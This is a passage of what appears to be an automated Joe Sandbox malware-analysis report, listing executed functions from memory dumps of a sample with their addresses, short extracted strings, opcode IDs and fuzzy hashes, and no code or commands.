                                                                  • Instruction ID: cf75229c8557a9f10f2e9866cdd81af8d2f61577fd8f9b1b4a2ced8ae7bcc8e5
                                                                  • Opcode Fuzzy Hash: 96dd22b00d614858c8b155fb1170989f52d0b32f84f7a925d2882f9cdde4bde9
                                                                  • Instruction Fuzzy Hash: 77511B23A2B276A6E19177EC74455EAAB64EF452FDF088777E14C8D0838E1C648182FD

                                                                  Executed Functions

                                                                  Function 00007FF848F40D4C Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5X_H
                                                                  • API String ID: 0-3241812158
                                                                  • Opcode ID: 65097bf83e33737f4c5dbe60ae2c2ac680d45c64c8d07ede2b540980af188ac7
                                                                  • Instruction ID: ddb4bcd6d7cdc62fc18970bca41183179054b39f7061587c0cf4d14f4ca90c43
                                                                  • Opcode Fuzzy Hash: 65097bf83e33737f4c5dbe60ae2c2ac680d45c64c8d07ede2b540980af188ac7
                                                                  • Instruction Fuzzy Hash: 4D91D07191CA999FE789EB6C88697B97FE1FB99350F0001BEC008D72D2DB7914148B51
                                                                  Function 00007FF848F40B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: fa33613465739c384d0fcea7d75dc7e00d25afd541c4208485bd3048da13d746
                                                                  • Instruction ID: 5cd7a5f1d2fcd0e75ef7862164ff14545f4eea2bb7a947d71b3b477837ff8f63
                                                                  • Opcode Fuzzy Hash: fa33613465739c384d0fcea7d75dc7e00d25afd541c4208485bd3048da13d746
                                                                  • Instruction Fuzzy Hash: 19F04437B299464BC7427B3DFC914F8BB40EAA7276BA502BBD084C71A2E252145EC3D1
                                                                  Function 00007FF848F408D0 Relevance: .1, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52dd6ef05e1a9c208552175921a61ea6fac90de1c7368ca739839942be19ae73
                                                                  • Instruction ID: 4f4b9f0f751b127f52efc80d5d1e41c205139c648a213ee32405912bd100f348
                                                                  • Opcode Fuzzy Hash: 52dd6ef05e1a9c208552175921a61ea6fac90de1c7368ca739839942be19ae73
                                                                  • Instruction Fuzzy Hash: FB419C22A1E5556EE345B37C60862FD3790EF953A4F1806BBD00CCB1D7DE1C6881829D
                                                                  Function 00007FF848F40998 Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 28b69d356c7880dd8e860d310963bdbf6297c63c0d8b72e9daabba88cc91042e
                                                                  • Instruction ID: c996510d25a5f467e7e9fd182843b2cdf164d5d00a2b5feb08402706699053a1
                                                                  • Opcode Fuzzy Hash: 28b69d356c7880dd8e860d310963bdbf6297c63c0d8b72e9daabba88cc91042e
                                                                  • Instruction Fuzzy Hash: FF212420B1C9595FE788F72C545A7B977C2EFA8761F1401BAE80DC32D3DE18AC818689
                                                                  Function 00007FF848F40C25 Relevance: .1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c5fbbd054b6c2d83ab5a3413d9ba5b3a91e1861e5b8f1429524ec1ea9c6aa977
                                                                  • Instruction ID: 0f367274fb6296bed7c8534cc41866bf666b5de15d0a5d6a1583275bb876b575
                                                                  • Opcode Fuzzy Hash: c5fbbd054b6c2d83ab5a3413d9ba5b3a91e1861e5b8f1429524ec1ea9c6aa977
                                                                  • Instruction Fuzzy Hash: 37210436A0D28ADEE342B77898011ED7B60EF923A5F1441B7C548EB1D3DA3C2546C799
                                                                  Function 00007FF848F41996 Relevance: .1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5fed09a3f58fc885a9c2c13e08a512fbd6d2f5d7797cf5e9ae36eac92d5650ec
                                                                  • Instruction ID: 8a764e4a8b7e471897744e8bb72147d59156c21821f37c7d9f9adf6d0dbb6c4a
                                                                  • Opcode Fuzzy Hash: 5fed09a3f58fc885a9c2c13e08a512fbd6d2f5d7797cf5e9ae36eac92d5650ec
                                                                  • Instruction Fuzzy Hash: 9C110331E0C81A8FEB94F724C4556B87392EFA5751F1441B6D44EE72D2EE28AC818B48
                                                                  Function 00007FF848F40C38 Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b67829e4965b060cf185754f7a9c3a1d2a63fb2351a779908978472f40983711
                                                                  • Instruction ID: 31d893924cafbdb7776043b2563ac20f064af60701743cc46fc8ee1eebc3af59
                                                                  • Opcode Fuzzy Hash: b67829e4965b060cf185754f7a9c3a1d2a63fb2351a779908978472f40983711
                                                                  • Instruction Fuzzy Hash: 7311E031A0D689CFE742FB6888411AC7FB0EFA2790F0444F7C984EB2D3D63825498789
                                                                  Function 00007FF848F4190D Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c9c341816abbe1277c8dc175f76d6f0e7f3833a9345555861f323a948669871
                                                                  • Instruction ID: 0bc2ba8204ae8ea150c04b4461dad9271cedce4cdfc4637275278575ada0cc69
                                                                  • Opcode Fuzzy Hash: 6c9c341816abbe1277c8dc175f76d6f0e7f3833a9345555861f323a948669871
                                                                  • Instruction Fuzzy Hash: E4018431E1C82B8EE7E4FB1884143B96291EFA4B90F1501B7C41DE32D6DF386DC58648
                                                                  Function 00007FF848F40C40 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 674f871fbcd245ff71f3038a1b2b6e14c5b77711d036139d6817ecb5b1c143c5
                                                                  • Instruction ID: 5e7c4e68c695d9d345f2f38ea842d4e41b40ffcb7529d39b48bca791d52503ec
                                                                  • Opcode Fuzzy Hash: 674f871fbcd245ff71f3038a1b2b6e14c5b77711d036139d6817ecb5b1c143c5
                                                                  • Instruction Fuzzy Hash: 4A11CE3190D289CFE742FB2488400AD7FB0EFA2790F0445F7C884EB2E3D63865498784
                                                                  Function 00007FF848F45A29 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a36a0554c2e0357f88468c9112593935df50e1c35cc970be7648ea71e4ed98cf
                                                                  • Instruction ID: b8f2890b658bde08bd41c96d3944ed9cdae0d955b73d65394b73a958650b2e84
                                                                  • Opcode Fuzzy Hash: a36a0554c2e0357f88468c9112593935df50e1c35cc970be7648ea71e4ed98cf
                                                                  • Instruction Fuzzy Hash: C6012135508A5A8FCB55EF08C894BA977E1FBA8314F1502AAD40DD76A1DB34EA40CF85
                                                                  Function 00007FF848F40C50 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f05fe97c0a49c24807b92b35706773511a9508799167ed0029207c040c85034c
                                                                  • Instruction ID: 7e0b43e9eec98fba3acb85c298a47b0410981bb2a8727388273531b4238efcaa
                                                                  • Opcode Fuzzy Hash: f05fe97c0a49c24807b92b35706773511a9508799167ed0029207c040c85034c
                                                                  • Instruction Fuzzy Hash: 04014830D0D289DEE782FB6488445A9BFB0AFA2744F1445F7D884EB2D3DA386A448745
                                                                  Function 00007FF848F40BB5 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction ID: 6f5f43be4f27808bd5ed27373df70daf7cd9396e1666cd96f55d93578b504e75
                                                                  • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction Fuzzy Hash: AEF0E530E5D54A4FEA407338D8D28A87F60EFAB210FC504F3D488C61D3EA49599A831A
                                                                  Function 00007FF848F419C3 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction ID: 886b43cf90ba53d0cf09ede9c4ba5aad767b109792e2947feaebd84e6dc3aecd
                                                                  • Opcode Fuzzy Hash: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction Fuzzy Hash: C9F03130D0C81A8EEB94FB14C8546F87361EBA0751F1401B6C44EA32D2DE7869C58A44
                                                                  Function 00007FF848F40B77 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bb0e4705a656285166172dd8ca33ec69edecf3cd142fd720dca67967619ebede
                                                                  • Instruction ID: ce7ddddd7af3874c912ce28db47f845dc5f4a132f5f94253bc6d14435cb925aa
                                                                  • Opcode Fuzzy Hash: bb0e4705a656285166172dd8ca33ec69edecf3cd142fd720dca67967619ebede
                                                                  • Instruction Fuzzy Hash: C7F0AB3560E9858FD781AB38ECE04E4BB60FF13308B6616EAC0C9C30A2C252055DC700
                                                                  Function 00007FF848F461A2 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 18369380c65e4c342225db104cdf16b59c683c459618c356ab6ca6e184ddc7d3
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: 46F03934D0C1264FF7A4A254D4513AA63A0EBA4750F1400BAD90EA33C2DE3CAD818B19
                                                                  Function 00007FF848F406A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: a144b7714f096e9690a12ab09cd8fb29104e8fd3cf48140c528981268bff062e
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: FDC08C21D1E40B08F480B36E18020ACA1005BF4F90FE00033CC0D600C3AE0D20C5018E
                                                                  Function 00007FF848F412B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: f065831ebd1a1b53ed8eb6600afb9187c7e36720eee3f04111f77149463b3a75
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 5CC04C345558099FD948FB29C88591477A0FB19215BD60090E409CB1B1D659DCD5C745
                                                                  Function 00007FF848F40B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 9243553e8296ae210d3b752d3f9dacd0808995e6ab42c23aa80c393566eb2edc
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: D1C08C305108088FC900F72CC88480072A0FB0D210BC10090E00DCB2B1E31A9CC4C700
                                                                  Function 00007FF848F45E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aa2e8b8b221c6f330d9ec20670103e124d2d3f6cb76f30ea60f539c46f612a6e
                                                                  • Instruction ID: 06aa9f182503a8ed120eb1fe3277c5442ce326ff391d3dc5f10a8fa9e7be7b5e
                                                                  • Opcode Fuzzy Hash: aa2e8b8b221c6f330d9ec20670103e124d2d3f6cb76f30ea60f539c46f612a6e
                                                                  • Instruction Fuzzy Hash: 14C04C12E1B82A96F266631850212BE48579F94B48F94107AE40E9B3CACF4C5B41468B
                                                                  Function 00007FF848F406C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2185157213.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848f40000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: b6e0460c78f17e90d5b2b1886824dd5463970b492affbd796a8b10c6c21c2174
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 69B01210C6E40F04F44433BA0C4206570405B94640FD00071DC0C601C3994D10D4028A

                                                                  Executed Functions

                                                                  Function 00007FF848F30EF0 Relevance: 2.8, Strings: 1, Instructions: 1518COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f30000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3<M_^
                                                                  • API String ID: 0-3665129970
                                                                  • Opcode ID: 2ab621ebc0b4d076758a6333366e6ca935898cf72e47bf16927a28a4421eaddc
                                                                  • Instruction ID: 10fcee0fbd67d598ae41e3abd81383dad8a6194401c66958b08d76c81cd8ba82
                                                                  • Opcode Fuzzy Hash: 2ab621ebc0b4d076758a6333366e6ca935898cf72e47bf16927a28a4421eaddc
                                                                  • Instruction Fuzzy Hash: 28B27131E1C91A8FEA99FB2894516B973E2FF98741F1441B9D40DC32C7DE38AC828785
                                                                  Function 00007FF848F20D4C Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5Z_H
                                                                  • API String ID: 0-3267294416
                                                                  • Opcode ID: e11b8c0605dc785196b0f601a35f558a696a84856ccad721e148579a247c8056
                                                                  • Instruction ID: 0764efdb7043e47a0bbbd81de10c4866b2b84c10e353a4c20e7294f5da0cfcc6
                                                                  • Opcode Fuzzy Hash: e11b8c0605dc785196b0f601a35f558a696a84856ccad721e148579a247c8056
                                                                  • Instruction Fuzzy Hash: AB91F071D2DA9A8FE78AEB6898697A97FF1FB95350F0000BAC00DD72D2CF7918148745
                                                                  Function 00007FF848F20B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f20000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction ID: ba731a2ff701c1ff3eb2f9f24a765302349bddb1563c4b93ddaa09ce362c202a
                                                                  • Opcode Fuzzy Hash: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction Fuzzy Hash: A601493771D9664BD741773DFC905D8BB40EB9627679506BBD184C7192E241144AC3D0
                                                                  Function 00007FF848F53A9D Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @aH$M
                                                                  • API String ID: 0-2096102131
                                                                  • Opcode ID: d0f163cb3c66ea6585ef3cf330a3ad91c99cd34783a662794415ba8b43dba41e
                                                                  • Instruction ID: 7e92928911b9e2ebbafb3e8f0665ce35ef1beb06c9d5419ae51d247aac51b270
                                                                  • Opcode Fuzzy Hash: d0f163cb3c66ea6585ef3cf330a3ad91c99cd34783a662794415ba8b43dba41e
                                                                  • Instruction Fuzzy Hash: 10719131E1CA9A5FE699FB2C8466275B2D1FF96391F8441B9C40DC71C3DE2C6C858349
                                                                  Function 00007FF848F52268 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: dc65db4ae4a1ab43ad1d0e4b6f33e3b9c2528860ab74486179f326f4ed30157d
                                                                  • Instruction ID: 5362d00ecaa7a5a969375e4eeb113dc4d743df5304e2f949abfcf4eb87716c56
                                                                  • Opcode Fuzzy Hash: dc65db4ae4a1ab43ad1d0e4b6f33e3b9c2528860ab74486179f326f4ed30157d
                                                                  • Instruction Fuzzy Hash: 35119D3184F3C14FEB07A7344868995BFA0AF53255B0D82EED095CF0E3DA6A484AC712
                                                                  Function 00007FF848F5A569 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: d0676e24e96bd385dc04f3fb5ab814f47850c6a6534832e8c14487367f2385e4
                                                                  • Instruction ID: 42a85964706cc06926d49ac6abc63d86f823d33bf9f4328828610c9088c79b8f
                                                                  • Opcode Fuzzy Hash: d0676e24e96bd385dc04f3fb5ab814f47850c6a6534832e8c14487367f2385e4
                                                                  • Instruction Fuzzy Hash: 7EE06571A0E7844FC719EA344459454BF60EF6720174941EEC045CF1A3EA2DC886C701
                                                                  Function 00007FF848F53609 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 3076cf459687321224178ac50af6658c038033d25900b3ffd36c31a4ba42240d
                                                                  • Instruction ID: 6d91390a3181b9bc3f26c66fe6aba2e6b33ba306a0782361312dd739a70a3054
                                                                  • Opcode Fuzzy Hash: 3076cf459687321224178ac50af6658c038033d25900b3ffd36c31a4ba42240d
                                                                  • Instruction Fuzzy Hash: 72F0307150E7C54FC75AEA388869455BF60EF6721174A52EFC045CF2A3EA298C85C711
                                                                  Function 00007FF848F52319 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 21bb7ab671a7c18f2c7a8db96f44953d26707d75b87d4a3031d260b0ed5fb832
                                                                  • Instruction ID: 8055a4b1226b5d9c3daa5f2e45af7098b1d492a8b02259d60570deff207d18ff
                                                                  • Opcode Fuzzy Hash: 21bb7ab671a7c18f2c7a8db96f44953d26707d75b87d4a3031d260b0ed5fb832
                                                                  • Instruction Fuzzy Hash: DDF0E57190E3C04FC706EB348868404BFA0EF2720174941EEC046CF2A3EA2D9C85C701
                                                                  Function 00007FF848F5A5F9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2186579916.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff848f51000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 4b7847441db77ca2348d303fb15cdd4d2da3a3e065ef733f179b8bfc3901390c
                                                                  • Instruction ID: e9621f717fe131509cc8430e1c96714fce06537ce22191bd59f9bebc65db5831
